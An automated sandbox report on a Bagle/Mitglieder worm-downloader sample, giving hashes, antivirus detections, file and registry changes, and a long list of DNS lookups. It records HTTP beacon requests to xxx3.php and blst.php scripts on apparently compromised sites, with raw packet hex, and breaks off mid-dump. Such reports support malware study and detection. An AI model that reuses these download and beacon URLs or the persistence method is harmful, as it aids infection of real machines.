Analysis Date2014-12-19 00:38:43
MD510add5ef022c501df8fa0ba97d587358
SHA1927efbbe1aa5021214cbc7ca75e6a05509cbf4f5

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rsrc md5: 6681b44a9cc612a41e98eda9a4707063 sha1: 4c9e3b54912dcfb47c9ee1a89ca7500c026a2272 size: 10240
Section.code md5: eebc3d0eeb0c75abf1046bc5df6e4ea4 sha1: da9c2ab0ee743d8442acb1e5d4ba0671e9710f6b size: 991
Timestamp1970-01-01 00:00:00
PEhashe0c3272bd914c59b8776b43fd9abb944798f1dcf
IMPhashbd51a645a9c68bd03b2e51586e5cbdcb
AV360 SafeWin32.Bagle.EX@mm
AVAd-AwareWin32.Bagle.EX@mm
AVAlwil (avast)Beagle-JG [Wrm]
AVArcabit (arcavir)Win32.Bagle.EX@mm
AVAuthentiumW32/Downloader.J.gen!Eldorado
AVAvira (antivir)TR/Dldr.Bagle.FR.4
AVBullGuardWin32.Bagle.EX@mm
AVCA (E-Trust Ino)Win32/Mitglieder.DQ
AVCAT (quickheal)I-Worm.Bagle.fn.nw3
AVClamAVTrojan.Bagle.CS-1
AVDr. WebTrojan.DownLoader.6508
AVEmsisoftWin32.Bagle.EX@mm
AVEset (nod32)Win32/Bagle.FE worm
AVFortinetW32/Mitglieder.HK!tr.dldr
AVFrisk (f-prot)W32/Downloader.J.gen!Eldorado
AVF-SecureWin32.Bagle.EX@mm
AVGrisoft (avg)I-Worm/Bagle
AVIkarusTrojan-Downloader.Win32.Bagle.aq
AVK7EmailWorm ( 00003b771 )
AVKasperskyEmail-Worm.Win32.Bagle.fn
AVMalwareBytesno_virus
AVMcafeeW32/Bagle.gen
AVMicrosoft Security EssentialsTrojanProxy:Win32/Mitglieder.gen!A
AVMicroWorld (escan)Win32.Bagle.EX@mm
AVRisingTrojan.Win32.Generic.122AB11B
AVSophosTroj/BagleDl-BI
AVSymantecW32.Beagle.DP
AVTrend MicroTROJ_BAGLE.CV
AVVirusBlokAda (vba32)Worm.Bagle

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\system32\wintems.exe
Creates FilePIPE\wkssvc
Creates Process"C:\WINDOWS\system32\wintems.exe"

Process
↳ "C:\WINDOWS\system32\wintems.exe"

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\DateTime4\uid ➝
42672611
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\german.exe ➝
C:\WINDOWS\system32\wintems.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex555
Winsock DNSturnstylesticketing.com
Winsock DNSredshop.ru
Winsock DNSgolden-ring.net
Winsock DNScoral-adventures.com
Winsock DNSmonomah-city.ru
Winsock DNSmerkur-akademie.de
Winsock DNSservice6.valuehost.ru
Winsock DNSwww.emil-zittau.de
Winsock DNSkmold.biz
Winsock DNS8marta.ru
Winsock DNSwww.moscowapartments.ru
Winsock DNSjamminjo.com
Winsock DNSefpa-eg.net
Winsock DNSwww.g-antssoft.com
Winsock DNSwww.13tw22rigobert.de
Winsock DNSroszvetmet.com
Winsock DNSdearruthie.com
Winsock DNSvtr-spb.ru
Winsock DNStrehrechie.ru
Winsock DNSvserozetki.ru
Winsock DNSschiffsparty.de
Winsock DNSwww.katjas-reisen.de
Winsock DNSwww.ordendeslichts.de
Winsock DNStransaerotours.ru
Winsock DNSraz-naraz.wz.cz
Winsock DNScelebrationsinspain.com
Winsock DNSavistrade.ru
Winsock DNSwww.pechki.ru
Winsock DNSsdom.ru
Winsock DNSwww.etype.hostingcity.net
Winsock DNSvniipo.ru
Winsock DNSgoodbathscents.com
Winsock DNSstroyindustry.ru
Winsock DNSnakorable.ru
Winsock DNSvladzernoproduct.ru
Winsock DNSwww.zdom.ru
Winsock DNSfinancialbusiness.ca
Winsock DNSwww.deadlygames.de
Winsock DNStarkan.ru
Winsock DNSkokon.com
Winsock DNSwww.enertelligence.com
Winsock DNSdmax.ru
Winsock DNSwww.levada.ru
Winsock DNSkomt.ru
Winsock DNSwww.rhone.ch
Winsock DNSwww.ipromocionales.com
Winsock DNSferrumcomp.ru
Winsock DNScalimasurf.com
Winsock DNSmir-vesov.ru
Winsock DNSpvcps.ru
Winsock DNSwww.enkor.ru
Winsock DNSoptimsasia.com
Winsock DNSvoelckergmbh.de
Winsock DNSasvt.ru
Winsock DNSwww.mirage.ru
Winsock DNSmagian.ru
Winsock DNStwilightzone.cz
Winsock DNSwww.belteh.ru
Winsock DNSwww.bmblawfirm.com
Winsock DNSspbso.ru

Network Details:

DNSavistrade.ru
Type: A
178.210.88.154
DNSmir-vesov.ru
Type: A
90.156.201.83
DNSmir-vesov.ru
Type: A
90.156.201.42
DNSmir-vesov.ru
Type: A
90.156.201.64
DNSmir-vesov.ru
Type: A
90.156.201.67
DNSmonomah-city.ru
Type: A
78.108.81.40
DNSroszvetmet.com
Type: A
69.162.176.121
DNSwww.13tw22rigobert.de
Type: A
82.98.85.10
DNSschiffsparty.de
Type: A
188.138.41.38
DNStrehrechie.ru
Type: A
62.109.15.253
DNSturnstylesticketing.com
Type: A
184.154.247.90
DNSstroyindustry.ru
Type: A
90.156.201.67
DNSstroyindustry.ru
Type: A
90.156.201.85
DNSstroyindustry.ru
Type: A
90.156.201.94
DNSstroyindustry.ru
Type: A
90.156.201.19
DNSvladzernoproduct.ru
Type: A
90.156.201.25
DNSvladzernoproduct.ru
Type: A
90.156.201.64
DNSvladzernoproduct.ru
Type: A
90.156.201.79
DNSvladzernoproduct.ru
Type: A
90.156.201.115
DNStwilightzone.cz
Type: A
81.2.194.128
DNSvniipo.ru
Type: A
217.112.42.81
DNSwww.emil-zittau.de
Type: A
85.13.133.93
DNSvoelckergmbh.de
Type: A
82.165.99.3
DNSvserozetki.ru
Type: A
212.193.234.215
DNSwww.levada.ru
Type: A
89.108.110.226
DNSwww.mirage.ru
Type: A
77.222.40.220
DNSwww.belteh.ru
Type: A
195.24.71.31
DNS8marta.ru
Type: A
213.189.197.48
DNSasvt.ru
Type: A
212.46.0.130
DNScalimasurf.com
Type: A
154.58.201.41
DNScelebrationsinspain.com
Type: A
184.168.47.225
DNSdmax.ru
Type: A
78.108.80.33
DNSefpa-eg.net
Type: A
198.1.89.199
DNSenertelligence.com
Type: A
206.130.102.18
DNSfinancialbusiness.ca
Type: A
184.107.41.82
DNSwww.enkor.ru
Type: A
90.156.201.12
DNSwww.enkor.ru
Type: A
90.156.201.15
DNSwww.enkor.ru
Type: A
90.156.201.65
DNSwww.enkor.ru
Type: A
90.156.201.92
DNSgolden-ring.net
Type: A
217.23.154.154
DNSg-antssoft.com
Type: A
113.208.23.123
DNSjamminjo.com
Type: A
66.96.147.104
DNSkmold.biz
Type: A
116.127.123.49
DNSkokon.com
Type: A
162.13.104.149
DNSkomt.ru
Type: A
5.9.59.171
DNSmerkur-akademie.de
Type: A
31.170.109.130
DNSnakorable.ru
Type: A
178.218.218.18
DNSnakorable.ru
Type: A
178.218.218.19
DNSnakorable.ru
Type: A
178.218.218.20
DNSnakorable.ru
Type: A
178.218.218.21
DNSraz-naraz.wz.cz
Type: A
88.86.113.152
DNSredshop.ru
Type: A
94.76.205.132
DNSspbso.ru
Type: A
82.146.40.33
DNStarkan.ru
Type: A
127.0.0.1
DNStransaerotours.ru
Type: A
95.128.178.170
DNSwww.katjas-reisen.de
Type: A
213.95.81.32
DNSwww.moscowapartments.ru
Type: A
193.232.158.144
DNSwww.moscowapartments.ru
Type: A
193.232.158.145
DNSwww.moscowapartments.ru
Type: A
193.232.159.144
DNSwww.moscowapartments.ru
Type: A
193.232.159.145
DNSpechki.ru
Type: A
79.174.72.81
DNSwww.rhone.ch
Type: A
81.201.201.6
DNSwww.zdom.ru
Type: A
194.58.35.101
DNSpvcps.ru
Type: A
DNSservice6.valuehost.ru
Type: A
DNSwww.deadlygames.de
Type: A
DNSwww.etype.hostingcity.net
Type: A
DNSvtr-spb.ru
Type: A
DNSwww.ordendeslichts.de
Type: A
DNSwww.bmblawfirm.com
Type: A
DNSwww.enertelligence.com
Type: A
DNScoral-adventures.com
Type: A
DNSdearruthie.com
Type: A
DNSferrumcomp.ru
Type: A
DNSwww.g-antssoft.com
Type: A
DNSgoodbathscents.com
Type: A
DNSmagian.ru
Type: A
DNSoptimsasia.com
Type: A
DNSsdom.ru
Type: A
DNSwww.ipromocionales.com
Type: A
DNSwww.pechki.ru
Type: A
HTTP GEThttp://avistrade.ru/prog/img/proizvod/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://avistrade.ru/prog/img/proizvod/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://mir-vesov.ru/p/lang/CVS/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://mir-vesov.ru/p/lang/CVS/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://monomah-city.ru/vakans/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://monomah-city.ru/vakans/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://roszvetmet.com/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://www.13tw22rigobert.de/_themes/kopie-von-fantasie-in-blau/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://schiffsparty.de/bilder/uploads/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://trehrechie.ru/images/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://turnstylesticketing.com/images/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://stroyindustry.ru/service/construction/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://vladzernoproduct.ru/control/sell/t/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://twilightzone.cz/distro/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.13tw22rigobert.de/_themes/kopie-von-fantasie-in-blau/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://vniipo.ru/images/_notes/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.emil-zittau.de/karten/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://voelckergmbh.de/images/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://vserozetki.ru/images/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.levada.ru/htmlarea/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://www.mirage.ru/sport/omega/pic/omega/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://www.belteh.ru/images/ludi/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://8marta.ru/img/path/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://asvt.ru/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://calimasurf.com/images/base/orig/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://celebrationsinspain.com/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://dmax.ru/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://efpa-eg.net/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://www.enertelligence.com/playitsafe/images/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://financialbusiness.ca/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://www.enkor.ru/images/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://golden-ring.net/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://www.g-antssoft.com/images/icon/jpg/blog/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://jamminjo.com/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://kmold.biz/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://kokon.com/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://komt.ru/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://merkur-akademie.de/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://nakorable.ru/htdocs/img/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://raz-naraz.wz.cz/html/fanklub/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://redshop.ru/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://spbso.ru/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://transaerotours.ru/img/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://www.katjas-reisen.de/blog/images/colors/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://www.moscowapartments.ru/images/_vti_cnf/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://www.pechki.ru/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://www.rhone.ch/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
HTTP GEThttp://www.zdom.ru/images/xxx3.php?p=23422&id=426726118&e=4261216
User-Agent: szNotifyIdent
Flows TCP192.168.1.1:1037 ➝ 178.210.88.154:80
Flows TCP192.168.1.1:1038 ➝ 178.210.88.154:80
Flows TCP192.168.1.1:1039 ➝ 90.156.201.83:80
Flows TCP192.168.1.1:1040 ➝ 90.156.201.83:80
Flows TCP192.168.1.1:1041 ➝ 78.108.81.40:80
Flows TCP192.168.1.1:1042 ➝ 78.108.81.40:80
Flows TCP192.168.1.1:1043 ➝ 69.162.176.121:80
Flows TCP192.168.1.1:1045 ➝ 82.98.85.10:80
Flows TCP192.168.1.1:1046 ➝ 188.138.41.38:80
Flows TCP192.168.1.1:1047 ➝ 62.109.15.253:80
Flows TCP192.168.1.1:1048 ➝ 184.154.247.90:80
Flows TCP192.168.1.1:1049 ➝ 90.156.201.67:80
Flows TCP192.168.1.1:1050 ➝ 90.156.201.25:80
Flows TCP192.168.1.1:1051 ➝ 81.2.194.128:80
Flows TCP192.168.1.1:1052 ➝ 82.98.85.10:80
Flows TCP192.168.1.1:1053 ➝ 217.112.42.81:80
Flows TCP192.168.1.1:1054 ➝ 85.13.133.93:80
Flows TCP192.168.1.1:1055 ➝ 82.165.99.3:80
Flows TCP192.168.1.1:1056 ➝ 212.193.234.215:80
Flows TCP192.168.1.1:1057 ➝ 89.108.110.226:80
Flows TCP192.168.1.1:1058 ➝ 77.222.40.220:80
Flows TCP192.168.1.1:1059 ➝ 195.24.71.31:80
Flows TCP192.168.1.1:1060 ➝ 213.189.197.48:80
Flows TCP192.168.1.1:1061 ➝ 212.46.0.130:80
Flows TCP192.168.1.1:1062 ➝ 154.58.201.41:80
Flows TCP192.168.1.1:1063 ➝ 184.168.47.225:80
Flows TCP192.168.1.1:1064 ➝ 78.108.80.33:80
Flows TCP192.168.1.1:1065 ➝ 198.1.89.199:80
Flows TCP192.168.1.1:1066 ➝ 206.130.102.18:80
Flows TCP192.168.1.1:1067 ➝ 184.107.41.82:80
Flows TCP192.168.1.1:1068 ➝ 90.156.201.12:80
Flows TCP192.168.1.1:1069 ➝ 217.23.154.154:80
Flows TCP192.168.1.1:1070 ➝ 113.208.23.123:80
Flows TCP192.168.1.1:1071 ➝ 66.96.147.104:80
Flows TCP192.168.1.1:1072 ➝ 116.127.123.49:80
Flows TCP192.168.1.1:1073 ➝ 162.13.104.149:80
Flows TCP192.168.1.1:1074 ➝ 5.9.59.171:80
Flows TCP192.168.1.1:1075 ➝ 31.170.109.130:80
Flows TCP192.168.1.1:1076 ➝ 178.218.218.18:80
Flows TCP192.168.1.1:1077 ➝ 88.86.113.152:80
Flows TCP192.168.1.1:1078 ➝ 94.76.205.132:80
Flows TCP192.168.1.1:1079 ➝ 82.146.40.33:80
Flows TCP192.168.1.1:1081 ➝ 95.128.178.170:80
Flows TCP192.168.1.1:1082 ➝ 213.95.81.32:80
Flows TCP192.168.1.1:1083 ➝ 193.232.158.144:80
Flows TCP192.168.1.1:1084 ➝ 79.174.72.81:80
Flows TCP192.168.1.1:1085 ➝ 81.201.201.6:80
Flows TCP192.168.1.1:1086 ➝ 194.58.35.101:80

Raw Pcap
0x00000000 (00000)   47455420 2f70726f 672f696d 672f7072   GET /prog/img/pr
0x00000010 (00016)   6f697a76 6f642f78 7878332e 7068703f   oizvod/xxx3.php?
0x00000020 (00032)   703d3233 34323226 69643d34 32363732   p=23422&id=42672
0x00000030 (00048)   36313138 26653d34 32363132 31362048   6118&e=4261216 H
0x00000040 (00064)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000050 (00080)   656e743a 20737a4e 6f746966 79496465   ent: szNotifyIde
0x00000060 (00096)   6e740d0a 486f7374 3a206176 69737472   nt..Host: avistr
0x00000070 (00112)   6164652e 72750d0a 0d0a                ade.ru....

0x00000000 (00000)   47455420 2f70726f 672f696d 672f7072   GET /prog/img/pr
0x00000010 (00016)   6f697a76 6f642f62 6c73742e 70687020   oizvod/blst.php 
0x00000020 (00032)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000030 (00048)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000040 (00064)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000050 (00080)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000060 (00096)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000070 (00112)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000080 (00128)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000090 (00144)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000a0 (00160)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000b0 (00176)   486f7374 3a206176 69737472 6164652e   Host: avistrade.
0x000000c0 (00192)   72750d0a 436f6e6e 65637469 6f6e3a20   ru..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a       Keep-Alive....

0x00000000 (00000)   47455420 2f702f6c 616e672f 4356532f   GET /p/lang/CVS/
0x00000010 (00016)   78787833 2e706870 3f703d32 33343232   xxx3.php?p=23422
0x00000020 (00032)   2669643d 34323637 32363131 3826653d   &id=426726118&e=
0x00000030 (00048)   34323631 32313620 48545450 2f312e31   4261216 HTTP/1.1
0x00000040 (00064)   0d0a5573 65722d41 67656e74 3a20737a   ..User-Agent: sz
0x00000050 (00080)   4e6f7469 66794964 656e740d 0a486f73   NotifyIdent..Hos
0x00000060 (00096)   743a206d 69722d76 65736f76 2e72750d   t: mir-vesov.ru.
0x00000070 (00112)   0a0d0a70 61746962 6c653b20 4d534945   ...patible; MSIE
0x00000080 (00128)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000090 (00144)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000a0 (00160)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000b0 (00176)   486f7374 3a206176 69737472 6164652e   Host: avistrade.
0x000000c0 (00192)   72750d0a 436f6e6e 65637469 6f6e3a20   ru..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a       Keep-Alive....

0x00000000 (00000)   47455420 2f702f6c 616e672f 4356532f   GET /p/lang/CVS/
0x00000010 (00016)   626c7374 2e706870 20485454 502f312e   blst.php HTTP/1.
0x00000020 (00032)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000030 (00048)   41636365 70742d45 6e636f64 696e673a   Accept-Encoding:
0x00000040 (00064)   20677a69 702c2064 65666c61 74650d0a    gzip, deflate..
0x00000050 (00080)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000060 (00096)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000070 (00112)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000080 (00128)   696e646f 7773204e 5420352e 313b2053   indows NT 5.1; S
0x00000090 (00144)   56313b20 2e4e4554 20434c52 20322e30   V1; .NET CLR 2.0
0x000000a0 (00160)   2e353037 3237290d 0a486f73 743a206d   .50727)..Host: m
0x000000b0 (00176)   69722d76 65736f76 2e72750d 0a436f6e   ir-vesov.ru..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a6f 756e643c 2f68313e   ive....ound</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f76616b 616e732f 78787833   GET /vakans/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a206d   fyIdent..Host: m
0x00000060 (00096)   6f6e6f6d 61682d63 6974792e 72750d0a   onomah-city.ru..
0x00000070 (00112)   0d0a3031 34203030 3a33373a 35352047   ..014 00:37:55 G
0x00000080 (00128)   4d540d0a 0d0a3c68 746d6c3e 0a20203c   MT....<html>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f76616b 616e732f 626c7374   GET /vakans/blst
0x00000010 (00016)   2e706870 20485454 502f312e 310d0a41   .php HTTP/1.1..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000030 (00048)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000040 (00064)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a206d 6f6e6f6d   27)..Host: monom
0x000000b0 (00176)   61682d63 6974792e 72750d0a 436f6e6e   ah-city.ru..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a0a6f 756e643c 2f68313e   ve.....ound</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a2072   fyIdent..Host: r
0x00000060 (00096)   6f737a76 65746d65 742e636f 6d0d0a0d   oszvetmet.com...
0x00000070 (00112)   0a323031 34203030 3a33373a 35352047   .2014 00:37:55 G
0x00000080 (00128)   4d540d0a 0d0a3c68 746d6c3e 0a20203c   MT....<html>.  <
0x00000090 (00144)   68656164 3e0a2020 20203c74 69746c65   head>.    <title
